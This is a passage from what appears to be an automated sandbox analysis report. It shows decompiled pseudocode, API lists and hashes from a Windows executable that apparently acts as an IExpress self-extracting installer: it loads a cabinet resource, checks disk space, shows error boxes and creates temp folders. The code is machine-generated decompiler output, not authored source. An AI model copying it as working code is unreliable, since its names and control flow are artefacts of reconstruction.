                                                							__eflags = _t102 - _t112;
                                                							if(_t102 == _t112) {
                                                								break;
                                                							}
                                                							_t112 = _t112 + _t112;
                                                							_t78 = _t78 + 1;
                                                							__eflags = _t78 - _t118;
                                                							if(_t78 < _t118) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						__eflags = _t78 - _t118;
                                                						if(_t78 != _t118) {
                                                							__eflags =  *0xac9a34 & 0x00000008;
                                                							if(( *0xac9a34 & 0x00000008) == 0) {
                                                								L20:
                                                								_t103 =  *0xac9a38; // 0x0
                                                								_t110 =  *((intOrPtr*)(0xac89e0 + (_t78 & 0x0000ffff) * 4));
                                                								L21:
                                                								__eflags = (_v804 & 0x00000003) - 3;
                                                								if((_v804 & 0x00000003) != 3) {
                                                									__eflags = _v804 & 0x00000001;
                                                									if((_v804 & 0x00000001) == 0) {
                                                										__eflags = _t103 - _t116;
                                                									} else {
                                                										__eflags = _t110 - _t116;
                                                									}
                                                								} else {
                                                									__eflags = _t103 + _t110 - _t116;
                                                								}
                                                								if(__eflags <= 0) {
                                                									 *0xac9124 = 0;
                                                									_t66 = 1;
                                                								} else {
                                                									_t66 = E00AC268B(_a4, _t110, _t103,  &_v16);
                                                								}
                                                								goto L32;
                                                							}
                                                							__eflags = _v816 & 0x00008000;
                                                							if((_v816 & 0x00008000) == 0) {
                                                								goto L20;
                                                							}
                                                							_t105 =  *0xac9a38; // 0x0
                                                							_t110 =  *((intOrPtr*)(0xac89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xac89e0 + (_t78 & 0x0000ffff) * 4));
                                                							_t103 = (_t105 >> 2) +  *0xac9a38;
                                                							goto L21;
                                                						}
                                                						_t110 = 0x4c5;
                                                						E00AC44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                						goto L31;
                                                					}
                                                					memset( &_v788, 0, 0x200);
                                                					 *0xac9124 = E00AC6285();
                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                					_t110 = 0x4f9;
                                                					goto L30;
                                                				} else {
                                                					_t110 = 0x4bc;
                                                					E00AC44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                					 *0xac9124 = E00AC6285();
                                                					_t66 = 0;
                                                					L33:
                                                					return E00AC6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                				}
                                                			}



































                                                0x00ac597d
                                                0x00ac5988
                                                0x00ac598f
                                                0x00ac599a
                                                0x00ac59a6
                                                0x00ac59a8
                                                0x00ac59af
                                                0x00ac59b9
                                                0x00ac59dd
                                                0x00ac59e4
                                                0x00ac59f1
                                                0x00ac59fe
                                                0x00ac5a0b
                                                0x00ac5a13
                                                0x00ac5a19
                                                0x00ac5a1b
                                                0x00ac5ba1
                                                0x00ac5baf
                                                0x00ac5bbd
                                                0x00ac5bd8
                                                0x00ac5bde
                                                0x00ac5be3
                                                0x00ac5bec
                                                0x00ac5bf0
                                                0x00ac5bfc
                                                0x00ac5c02
                                                0x00ac5c02
                                                0x00ac5c02
                                                0x00ac5c04
                                                0x00ac5c04
                                                0x00000000
                                                0x00ac5c04
                                                0x00ac5a27
                                                0x00ac5a3a
                                                0x00ac5a46
                                                0x00ac5a48
                                                0x00ac5a4a
                                                0x00000000
                                                0x00000000
                                                0x00ac5a64
                                                0x00ac5a6a
                                                0x00ac5a6c
                                                0x00ac5abc
                                                0x00ac5ac2
                                                0x00ac5ac9
                                                0x00ac5aca
                                                0x00ac5aca
                                                0x00ac5acc
                                                0x00ac5acc
                                                0x00ac5acf
                                                0x00ac5ad1
                                                0x00000000
                                                0x00000000
                                                0x00ac5ad3
                                                0x00ac5ad6
                                                0x00ac5ad8
                                                0x00000000
                                                0x00000000
                                                0x00ac5ada
                                                0x00ac5adc
                                                0x00ac5add
                                                0x00ac5add
                                                0x00ac5ae0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac5ae0
                                                0x00ac5ae2
                                                0x00ac5ae4
                                                0x00ac5ae6
                                                0x00ac5ae6
                                                0x00ac5ae6
                                                0x00ac5ae9
                                                0x00ac5aeb
                                                0x00ac5af0
                                                0x00ac5af6
                                                0x00ac5af8
                                                0x00ac5af9
                                                0x00ac5af9
                                                0x00ac5afb
                                                0x00000000
                                                0x00000000
                                                0x00ac5afd
                                                0x00ac5aff
                                                0x00ac5b00
                                                0x00ac5b03
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac5b03
                                                0x00ac5b05
                                                0x00ac5b08
                                                0x00ac5b20
                                                0x00ac5b27
                                                0x00ac5b52
                                                0x00ac5b52
                                                0x00ac5b5b
                                                0x00ac5b62
                                                0x00ac5b6b
                                                0x00ac5b6d
                                                0x00ac5b76
                                                0x00ac5b7d
                                                0x00ac5b83
                                                0x00ac5b7f
                                                0x00ac5b7f
                                                0x00ac5b7f
                                                0x00ac5b6f
                                                0x00ac5b72
                                                0x00ac5b72
                                                0x00ac5b85
                                                0x00ac5b98
                                                0x00ac5b9e
                                                0x00ac5b87
                                                0x00ac5b8f
                                                0x00ac5b8f
                                                0x00000000
                                                0x00ac5b85
                                                0x00ac5b29
                                                0x00ac5b33
                                                0x00000000
                                                0x00000000
                                                0x00ac5b35
                                                0x00ac5b48
                                                0x00ac5b4a
                                                0x00000000
                                                0x00ac5b4a
                                                0x00ac5b0f
                                                0x00ac5b16
                                                0x00000000
                                                0x00ac5b16
                                                0x00ac5a7c
                                                0x00ac5a8a
                                                0x00ac5aa5
                                                0x00ac5aab
                                                0x00000000
                                                0x00ac59bb
                                                0x00ac59c0
                                                0x00ac59c7
                                                0x00ac59d1
                                                0x00ac59d6
                                                0x00ac5c05
                                                0x00ac5c14
                                                0x00ac5c14

                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00AC59A8
                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 00AC59AF
                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00AC5A13
                                                • MulDiv.KERNEL32(?,?,00000400), ref: 00AC5A40
                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00AC5A64
                                                • memset.MSVCRT ref: 00AC5A7C
                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00AC5A98
                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00AC5AA5
                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00AC5BFC
                                                  • Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
                                                  • Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554
                                                  • Part of subcall function 00AC6285: GetLastError.KERNEL32(00AC5BBC), ref: 00AC6285
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                • String ID:
                                                • API String ID: 4237285672-0
                                                • Opcode ID: e5c93ad83d18ff47a2fe15e04c0c1d9947e037cec055a52389c48847d3550e7d
                                                • Instruction ID: 3a3c7508bb8d1355e61f77d733a77f0266d448994df616a7a60ffe30f9f7fe8c
                                                • Opcode Fuzzy Hash: e5c93ad83d18ff47a2fe15e04c0c1d9947e037cec055a52389c48847d3550e7d
                                                • Instruction Fuzzy Hash: B77181B190060CAFEB25DB64CD89FFB77BCFB48344F5641ADF40596140EA34AE868B64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 374 ac4fe0-ac501a call ac468f FindResourceA LoadResource LockResource 377 ac5020-ac5027 374->377 378 ac5161-ac5163 374->378 379 ac5029-ac5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 ac5057-ac505e call ac4efd 377->380 379->380 383 ac507c-ac50b4 380->383 384 ac5060-ac5077 call ac44b9 380->384 388 ac50e8-ac5104 call ac44b9 383->388 389 ac50b6-ac50da 383->389 390 ac5107-ac510e 384->390 401 ac5106 388->401 400 ac50dc 389->400 389->401 392 ac511d-ac511f 390->392 393 ac5110-ac5117 FreeResource 390->393 396 ac513a-ac5141 392->396 397 ac5121-ac5127 392->397 393->392 398 ac515f 396->398 399 ac5143-ac514a 396->399 397->396 402 ac5129-ac5135 call ac44b9 397->402 398->378 399->398 403 ac514c-ac5159 SendMessageA 399->403 405 ac50e3-ac50e6 400->405 401->390 402->396 403->398 405->388 405->401
                                                C-Code - Quality: 77%
                                                			E00AC4FE0(void* __edi, void* __eflags) {
                                                				void* __ebx;
                                                				void* _t8;
                                                				struct HWND__* _t9;
                                                				int _t10;
                                                				void* _t12;
                                                				struct HWND__* _t24;
                                                				struct HWND__* _t27;
                                                				intOrPtr _t29;
                                                				void* _t33;
                                                				int _t34;
                                                				CHAR* _t36;
                                                				int _t37;
                                                				intOrPtr _t47;
                                                
                                                				_t33 = __edi;
                                                				_t36 = "CABINET";
                                                				 *0xac9144 = E00AC468F(_t36, 0, 0);
                                                				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                				 *0xac9140 = _t8;
                                                				if(_t8 == 0) {
                                                					return _t8;
                                                				}
                                                				_t9 =  *0xac8584; // 0x0
                                                				if(_t9 != 0) {
                                                					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                					ShowWindow(GetDlgItem( *0xac8584, 0x841), 5);
                                                				}
                                                				_t10 = E00AC4EFD(0, 0);
                                                				if(_t10 != 0) {
                                                					__imp__#20(E00AC4CA0, E00AC4CC0, E00AC4980, E00AC4A50, E00AC4AD0, E00AC4B60, E00AC4BC0, 1, 0xac9148, _t33);
                                                					_t34 = _t10;
                                                					if(_t34 == 0) {
                                                						L8:
                                                						_t29 =  *0xac9148; // 0x0
                                                						_t24 =  *0xac8584; // 0x0
                                                						E00AC44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                						_t37 = 0;
                                                						L9:
                                                						goto L10;
                                                					}
                                                					__imp__#22(_t34, "*MEMCAB", 0xac1140, 0, E00AC4CD0, 0, 0xac9140); // executed
                                                					_t37 = _t10;
                                                					if(_t37 == 0) {
                                                						goto L9;
                                                					}
                                                					__imp__#23(_t34); // executed
                                                					if(_t10 != 0) {
                                                						goto L9;
                                                					}
                                                					goto L8;
                                                				} else {
                                                					_t27 =  *0xac8584; // 0x0
                                                					E00AC44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                					_t37 = 0;
                                                					L10:
                                                					_t12 =  *0xac9140; // 0x0
                                                					if(_t12 != 0) {
                                                						FreeResource(_t12);
                                                						 *0xac9140 = 0;
                                                					}
                                                					if(_t37 == 0) {
                                                						_t47 =  *0xac91d8; // 0x0
                                                						if(_t47 == 0) {
                                                							E00AC44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                						}
                                                					}
                                                					if(( *0xac8a38 & 0x00000001) == 0 && ( *0xac9a34 & 0x00000001) == 0) {
                                                						SendMessageA( *0xac8584, 0xfa1, _t37, 0);
                                                					}
                                                					return _t37;
                                                				}
                                                			}
















                                                0x00ac4fe0
                                                0x00ac4fe6
                                                0x00ac4ff9
                                                0x00ac500d
                                                0x00ac5013
                                                0x00ac501a
                                                0x00ac5163
                                                0x00ac5163
                                                0x00ac5020
                                                0x00ac5027
                                                0x00ac5037
                                                0x00ac5051
                                                0x00ac5051
                                                0x00ac5057
                                                0x00ac505e
                                                0x00ac50a7
                                                0x00ac50ad
                                                0x00ac50b4
                                                0x00ac50e8
                                                0x00ac50e8
                                                0x00ac50ee
                                                0x00ac50ff
                                                0x00ac5104
                                                0x00ac5106
                                                0x00000000
                                                0x00ac5106
                                                0x00ac50cd
                                                0x00ac50d3
                                                0x00ac50da
                                                0x00000000
                                                0x00000000
                                                0x00ac50dd
                                                0x00ac50e6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac5060
                                                0x00ac5060
                                                0x00ac5070
                                                0x00ac5075
                                                0x00ac5107
                                                0x00ac5107
                                                0x00ac510e
                                                0x00ac5111
                                                0x00ac5117
                                                0x00ac5117
                                                0x00ac511f
                                                0x00ac5121
                                                0x00ac5127
                                                0x00ac5135
                                                0x00ac5135
                                                0x00ac5127
                                                0x00ac5141
                                                0x00ac5159
                                                0x00ac5159
                                                0x00000000
                                                0x00ac515f

                                                APIs
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
                                                  • Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
                                                  • Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
                                                  • Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
                                                  • Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
                                                  • Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF
                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00AC4FFE
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00AC5006
                                                • LockResource.KERNEL32(00000000), ref: 00AC500D
                                                • GetDlgItem.USER32(00000000,00000842), ref: 00AC5030
                                                • ShowWindow.USER32(00000000), ref: 00AC5037
                                                • GetDlgItem.USER32(00000841,00000005), ref: 00AC504A
                                                • ShowWindow.USER32(00000000), ref: 00AC5051
                                                • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00AC5111
                                                • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00AC5159
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                • String ID: *MEMCAB$CABINET
                                                • API String ID: 1305606123-2642027498
                                                • Opcode ID: b815c1822b732ee92e3ca0e192510f4d9d11f04dab2c6216c087df4b3e9760c4
                                                • Instruction ID: e66f376e362a88028d50ce9b0f46bfd1f1e308c27be14b164215a16f4caa5530
                                                • Opcode Fuzzy Hash: b815c1822b732ee92e3ca0e192510f4d9d11f04dab2c6216c087df4b3e9760c4
                                                • Instruction Fuzzy Hash: 273107B0B807057FD720DBA1AD9EF7736ACB758789F0B061CF901A21A1DEB89C428654
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 406 ac44b9-ac44f8 407 ac44fe-ac4525 LoadStringA 406->407 408 ac4679-ac467b 406->408 410 ac4527-ac452e call ac681f 407->410 411 ac4562-ac4568 407->411 409 ac467c-ac468c call ac6ce0 408->409 418 ac453f 410->418 419 ac4530-ac453d call ac67c9 410->419 413 ac456b-ac4570 411->413 413->413 417 ac4572-ac457c 413->417 420 ac457e-ac4580 417->420 421 ac45c9-ac45cb 417->421 425 ac4544-ac4554 MessageBoxA 418->425 419->418 419->425 426 ac4583-ac4588 420->426 423 ac45cd-ac45cf 421->423 424 ac4607-ac4617 LocalAlloc 421->424 428 ac45d2-ac45d7 423->428 429 ac455a-ac455d 424->429 430 ac461d-ac4628 call ac1680 424->430 425->429 426->426 431 ac458a-ac458c 426->431 428->428 432 ac45d9-ac45ed LocalAlloc 428->432 429->409 436 ac462d-ac463d MessageBeep call ac681f 430->436 434 ac458f-ac4594 431->434 432->429 435 ac45f3-ac4605 call ac171e 432->435 434->434 437 ac4596-ac45ad LocalAlloc 434->437 435->436 445 ac464e 436->445 446 ac463f-ac464c call ac67c9 436->446 437->429 440 ac45af-ac45c7 call ac171e 437->440 440->436 448 ac4653-ac4677 MessageBoxA LocalFree 445->448 446->445 446->448 448->409
                                                C-Code - Quality: 94%
                                                			E00AC44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                				signed int _v8;
                                                				char _v64;
                                                				char _v576;
                                                				void* _v580;
                                                				struct HWND__* _v584;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t34;
                                                				void* _t37;
                                                				signed int _t39;
                                                				intOrPtr _t43;
                                                				signed int _t44;
                                                				signed int _t49;
                                                				signed int _t52;
                                                				void* _t54;
                                                				intOrPtr _t55;
                                                				intOrPtr _t58;
                                                				intOrPtr _t59;
                                                				int _t64;
                                                				void* _t66;
                                                				intOrPtr* _t67;
                                                				signed int _t69;
                                                				intOrPtr* _t73;
                                                				intOrPtr* _t76;
                                                				intOrPtr* _t77;
                                                				void* _t80;
                                                				void* _t81;
                                                				void* _t82;
                                                				intOrPtr* _t84;
                                                				void* _t85;
                                                				signed int _t89;
                                                
                                                				_t75 = __edx;
                                                				_t34 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t34 ^ _t89;
                                                				_v584 = __ecx;
                                                				_t83 = "LoadString() Error.  Could not load string resource.";
                                                				_t67 = _a4;
                                                				_t69 = 0xd;
                                                				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                				_t80 = _t83 + _t69 + _t69;
                                                				_v580 = _t37;
                                                				asm("movsb");
                                                				if(( *0xac8a38 & 0x00000001) != 0) {
                                                					_t39 = 1;
                                                				} else {
                                                					_v576 = 0;
                                                					LoadStringA( *0xac9a3c, _t75,  &_v576, 0x200);
                                                					if(_v576 != 0) {
                                                						_t73 =  &_v576;
                                                						_t16 = _t73 + 1; // 0x1
                                                						_t75 = _t16;
                                                						do {
                                                							_t43 =  *_t73;
                                                							_t73 = _t73 + 1;
                                                						} while (_t43 != 0);
                                                						_t84 = _v580;
                                                						_t74 = _t73 - _t75;
                                                						if(_t84 == 0) {
                                                							if(_t67 == 0) {
                                                								_t27 = _t74 + 1; // 0x2
                                                								_t83 = _t27;
                                                								_t44 = LocalAlloc(0x40, _t83);
                                                								_t80 = _t44;
                                                								if(_t80 == 0) {
                                                									goto L6;
                                                								} else {
                                                									_t75 = _t83;
                                                									_t74 = _t80;
                                                									E00AC1680(_t80, _t83,  &_v576);
                                                									goto L23;
                                                								}
                                                							} else {
                                                								_t76 = _t67;
                                                								_t24 = _t76 + 1; // 0x1
                                                								_t85 = _t24;
                                                								do {
                                                									_t55 =  *_t76;
                                                									_t76 = _t76 + 1;
                                                								} while (_t55 != 0);
                                                								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                								_t83 = _t25 + _t74;
                                                								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                								_t80 = _t44;
                                                								if(_t80 == 0) {
                                                									goto L6;
                                                								} else {
                                                									E00AC171E(_t80, _t83,  &_v576, _t67);
                                                									goto L23;
                                                								}
                                                							}
                                                						} else {
                                                							_t77 = _t67;
                                                							_t18 = _t77 + 1; // 0x1
                                                							_t81 = _t18;
                                                							do {
                                                								_t58 =  *_t77;
                                                								_t77 = _t77 + 1;
                                                							} while (_t58 != 0);
                                                							_t75 = _t77 - _t81;
                                                							_t82 = _t84 + 1;
                                                							do {
                                                								_t59 =  *_t84;
                                                								_t84 = _t84 + 1;
                                                							} while (_t59 != 0);
                                                							_t21 = _t74 + 0x64; // 0x65
                                                							_t83 = _t21 + _t84 - _t82 + _t75;
                                                							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                							_t80 = _t44;
                                                							if(_t80 == 0) {
                                                								goto L6;
                                                							} else {
                                                								_push(_v580);
                                                								E00AC171E(_t80, _t83,  &_v576, _t67);
                                                								L23:
                                                								MessageBeep(_a12);
                                                								if(E00AC681F(_t67) == 0) {
                                                									L25:
                                                									_t49 = 0x10000;
                                                								} else {
                                                									_t54 = E00AC67C9(_t74, _t74);
                                                									_t49 = 0x190000;
                                                									if(_t54 == 0) {
                                                										goto L25;
                                                									}
                                                								}
                                                								_t52 = MessageBoxA(_v584, _t80, "lega", _t49 | _a12 | _a16); // executed
                                                								_t83 = _t52;
                                                								LocalFree(_t80);
                                                								_t39 = _t52;
                                                							}
                                                						}
                                                					} else {
                                                						if(E00AC681F(_t67) == 0) {
                                                							L4:
                                                							_t64 = 0x10010;
                                                						} else {
                                                							_t66 = E00AC67C9(0, 0);
                                                							_t64 = 0x190010;
                                                							if(_t66 == 0) {
                                                								goto L4;
                                                							}
                                                						}
                                                						_t44 = MessageBoxA(_v584,  &_v64, "lega", _t64);
                                                						L6:
                                                						_t39 = _t44 | 0xffffffff;
                                                					}
                                                				}
                                                				return E00AC6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                			}



































                                                0x00ac44b9
                                                0x00ac44c4
                                                0x00ac44cb
                                                0x00ac44d8
                                                0x00ac44e4
                                                0x00ac44eb
                                                0x00ac44ee
                                                0x00ac44ef
                                                0x00ac44ef
                                                0x00ac44f1
                                                0x00ac44f7
                                                0x00ac44f8
                                                0x00ac467b
                                                0x00ac44fe
                                                0x00ac4509
                                                0x00ac4518
                                                0x00ac4525
                                                0x00ac4562
                                                0x00ac4568
                                                0x00ac4568
                                                0x00ac456b
                                                0x00ac456b
                                                0x00ac456d
                                                0x00ac456e
                                                0x00ac4572
                                                0x00ac4578
                                                0x00ac457c
                                                0x00ac45cb
                                                0x00ac4607
                                                0x00ac4607
                                                0x00ac460d
                                                0x00ac4613
                                                0x00ac4617
                                                0x00000000
                                                0x00ac461d
                                                0x00ac4623
                                                0x00ac4626
                                                0x00ac4628
                                                0x00000000
                                                0x00ac4628
                                                0x00ac45cd
                                                0x00ac45cd
                                                0x00ac45cf
                                                0x00ac45cf
                                                0x00ac45d2
                                                0x00ac45d2
                                                0x00ac45d4
                                                0x00ac45d5
                                                0x00ac45db
                                                0x00ac45de
                                                0x00ac45e3
                                                0x00ac45e9
                                                0x00ac45ed
                                                0x00000000
                                                0x00ac45f3
                                                0x00ac45fd
                                                0x00000000
                                                0x00ac4602
                                                0x00ac45ed
                                                0x00ac457e
                                                0x00ac457e
                                                0x00ac4580
                                                0x00ac4580
                                                0x00ac4583
                                                0x00ac4583
                                                0x00ac4585
                                                0x00ac4586
                                                0x00ac458a
                                                0x00ac458c
                                                0x00ac458f
                                                0x00ac458f
                                                0x00ac4591
                                                0x00ac4592
                                                0x00ac459b
                                                0x00ac459e
                                                0x00ac45a3
                                                0x00ac45a9
                                                0x00ac45ad
                                                0x00000000
                                                0x00ac45af
                                                0x00ac45af
                                                0x00ac45bf
                                                0x00ac462d
                                                0x00ac4630
                                                0x00ac463d
                                                0x00ac464e
                                                0x00ac464e
                                                0x00ac463f
                                                0x00ac4640
                                                0x00ac4647
                                                0x00ac464c
                                                0x00000000
                                                0x00000000
                                                0x00ac464c
                                                0x00ac4666
                                                0x00ac466d
                                                0x00ac466f
                                                0x00ac4675
                                                0x00ac4675
                                                0x00ac45ad
                                                0x00ac4527
                                                0x00ac452e
                                                0x00ac453f
                                                0x00ac453f
                                                0x00ac4530
                                                0x00ac4531
                                                0x00ac4538
                                                0x00ac453d
                                                0x00000000
                                                0x00000000
                                                0x00ac453d
                                                0x00ac4554
                                                0x00ac455a
                                                0x00ac455a
                                                0x00ac455a
                                                0x00ac4525
                                                0x00ac468c

                                                APIs
                                                • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
                                                • MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554
                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 00AC45A3
                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 00AC45E3
                                                • LocalAlloc.KERNEL32(00000040,00000002), ref: 00AC460D
                                                • MessageBeep.USER32(00000000), ref: 00AC4630
                                                • MessageBoxA.USER32(?,00000000,lega,00000000), ref: 00AC4666
                                                • LocalFree.KERNEL32(00000000), ref: 00AC466F
                                                  • Part of subcall function 00AC681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00AC686E
                                                  • Part of subcall function 00AC681F: GetSystemMetrics.USER32(0000004A), ref: 00AC68A7
                                                  • Part of subcall function 00AC681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00AC68CC
                                                  • Part of subcall function 00AC681F: RegQueryValueExA.ADVAPI32(?,00AC1140,00000000,?,?,0000000C), ref: 00AC68F4
                                                  • Part of subcall function 00AC681F: RegCloseKey.ADVAPI32(?), ref: 00AC6902
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                • String ID: LoadString() Error. Could not load string resource.$lega
                                                • API String ID: 3244514340-2134167237
                                                • Opcode ID: 673d026a45a249078390a7670bc46d4d83bd2ea462fd94a13012a61d041d88d0
                                                • Instruction ID: 4652a68a81d5dcaf2250ca97de5199147d551c2671efb847f5c72557045fef43
                                                • Opcode Fuzzy Hash: 673d026a45a249078390a7670bc46d4d83bd2ea462fd94a13012a61d041d88d0
                                                • Instruction Fuzzy Hash: 0051E376900219ABDF21DF68CC58FBA7B69EF49304F164198FD09A7241DB32DD06CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 95%
                                                			E00AC53A1(CHAR* __ecx, CHAR* __edx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t5;
                                                				long _t13;
                                                				int _t14;
                                                				CHAR* _t20;
                                                				int _t29;
                                                				int _t30;
                                                				CHAR* _t32;
                                                				signed int _t33;
                                                				void* _t34;
                                                
                                                				_t5 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t5 ^ _t33;
                                                				_t32 = __edx;
                                                				_t20 = __ecx;
                                                				_t29 = 0;
                                                				while(1) {
                                                					E00AC171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                					_t34 = _t34 + 0x10;
                                                					_t29 = _t29 + 1;
                                                					E00AC1680(_t32, 0x104, _t20);
                                                					E00AC658A(_t32, 0x104,  &_v268); // executed
                                                					RemoveDirectoryA(_t32); // executed
                                                					_t13 = GetFileAttributesA(_t32); // executed
                                                					if(_t13 == 0xffffffff) {
                                                						break;
                                                					}
                                                					if(_t29 < 0x190) {
                                                						continue;
                                                					}
                                                					L3:
                                                					_t30 = 0;
                                                					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                						_t30 = 1;
                                                						DeleteFileA(_t32);
                                                						CreateDirectoryA(_t32, 0);
                                                					}
                                                					L5:
                                                					return E00AC6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                				}
                                                				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                				if(_t14 == 0) {
                                                					goto L3;
                                                				}
                                                				_t30 = 1;
                                                				 *0xac8a20 = 1;
                                                				goto L5;
                                                			}

















                                                0x00ac53ac
                                                0x00ac53b3
                                                0x00ac53b9
                                                0x00ac53bb
                                                0x00ac53bd
                                                0x00ac53bf
                                                0x00ac53d1
                                                0x00ac53d6
                                                0x00ac53e0
                                                0x00ac53e2
                                                0x00ac53f5
                                                0x00ac53fb
                                                0x00ac5402
                                                0x00ac540b
                                                0x00000000
                                                0x00000000
                                                0x00ac5413
                                                0x00000000
                                                0x00000000
                                                0x00ac5415
                                                0x00ac5416
                                                0x00ac5427
                                                0x00ac542a
                                                0x00ac542b
                                                0x00ac5434
                                                0x00ac5434
                                                0x00ac543a
